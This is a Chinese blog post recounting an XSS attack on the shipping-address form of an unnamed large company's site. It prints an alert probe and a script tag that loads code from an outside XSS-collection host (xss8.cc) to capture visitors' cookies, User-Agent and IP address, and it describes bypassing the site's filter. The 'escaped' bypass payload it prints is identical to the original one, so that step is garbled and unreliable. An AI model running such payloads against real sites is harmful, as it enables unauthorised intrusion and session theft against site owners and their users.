滲透實例 | 記錄一次XSS滲透過程
- 2019 年 10 月 6 日
- 筆記
0x01 找到存在XSS的位置
沒什麼技巧,見到框就X,功夫不負有心人,在目標網站編輯收貨地址處發現了存在XSS的地方,沒想到這種大公司還會存在XSS。
使用的XSS程式碼:<img src=1 onerror=alert(1)>

0x02 構造XSS程式碼連接到XSS平台
XSS平台給我們的XSS程式碼是這樣的:
</tExtArEa>'"><sCRiPt sRC=https://xss8.cc/3Ri4></sCrIpT>

直接插入的話會提示參數非法,經過多次嘗試,最後發現該平台會對雙引號、script字元進行識別過濾,大小寫會被過濾,於是嘗試插入下面的語句:
</tExtArEa>'"><sCRiPt sRC=https://xss8.cc/3Ri4></sCrIpT>
這條程式碼比上面平台給的XSS程式碼的多了幾個 「」,也就是轉義字元,利用轉義字元可以繞過該平台的策略,因為經驗不足,所以在這一步嘗試了很多種辦法都沒能繞過,要不有的可以插入但是連不上XSS平台,要不有的就是被識別攔截。

加上轉義字元成功插入後,刷新目標網站與XSS平台頁面,在XSS平台就能看到剛才的訪問記錄。

這裡可以獲取該登陸用戶的Cookie、User-Agent、IP地址什麼的,但是觸發這個XSS需要登陸存在XSS的帳號才行,所以個人覺著知道了這個Cookie也沒啥用。
並且雖然知道這裡存在XSS,但是觸發條件是需要知道用戶名和密碼,然後來到收貨地址頁面,所以個人感覺作用不大,因此在想這個漏洞還有沒有其他的利用價值,後續或許會繼續更新本次滲透過程,如果你有什麼好的想法,歡迎下方留言。
原文地址:https://www.teamssix.com/year/190703-221956.html